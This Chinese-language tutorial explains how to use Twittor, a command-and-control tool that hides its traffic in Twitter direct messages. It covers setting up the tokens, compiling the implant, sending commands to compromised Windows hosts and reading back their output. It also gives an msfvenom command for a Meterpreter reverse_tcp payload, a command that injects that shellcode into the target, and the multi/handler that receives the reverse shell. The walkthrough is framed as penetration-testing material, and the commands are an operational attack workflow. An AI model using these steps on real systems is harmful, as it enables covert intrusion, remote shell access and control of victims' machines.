社交媒体网络是公司营销团队的一个很好的工具。如果使用得当,他们往往会吸引新的业务。因此,几乎不可能将流量阻塞到Twitter和Facebook等社交媒体平台。它可以用于测试的优点是因为有各种命令和控制工具可以隐藏他们在社交媒体网络流量背后的活动。
使用Twitter的一个公知的命令和控制工具叫做Twittor。这个工具是由Paul Amar开发的,它基于Gcat的概念,它使用Gmail作为命令和控制服务器。
唯一的要求是植入物和C2服务器都需要消费者和访问令牌,这些令牌可以从Twitter应用程序管理生成。
创建新的Twitter应用程序后,将自动生成这些值。从控制器到主机的通信是通过Twitter直接消息执行的,因此新应用程序将需要读取,写入和直接消息访问。
植入物基于python,但是可以使用pyinstaller将其转换为可执行文件。应该注意,这个工具需要python 2.7。Pyinstaller可以直接从pip安装。
pip install pyinstaller
pyinstaller implant.py
一旦在目标上执行植入,Twittor将接收连接,并且将检索包括Windows构建的主机的MAC地址。
此时,Twittor能够在目标上执行命令,在内存中执行shellcode,还可以检索已在主机上执行的命令列表。
为了发送命令,Twittor使用目标的MAC地址。
$ list_bots
E0:94:67:90:22:6C: Windows-10-10.0.15063-SP0
$ !cmd E0:94:67:90:22:6C ipconfig/all
[+] Sent command "ipconfig/all" with jobid: SPVGIpE
该命令将通过Twitter上的直接消息以base-64编码格式发送给主机。
由于Twittor不使用任何加密,因此可以轻松解码直接消息。传输到目标的消息将包含以下信息:
- CMD命令
- 作业ID
- 寄件人
- 接收方MAC地址
可以使用带有关联JobID 的命令retrieve来检索命令的输出。
$ !retrieve SPVGIpE
还可以将shellcode传递给目标,以获得Meterpreter会话并利用其功能。Metasploit msfvenom可用于生成python shellcode。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XXX LPORT=4444 -f python
下面的命令将在目标上执行shellcode。
!shellcode E0:94:67:90:22:6C shellcode
以下Metasploit模块可用于接收连接。
exploit/multi/handler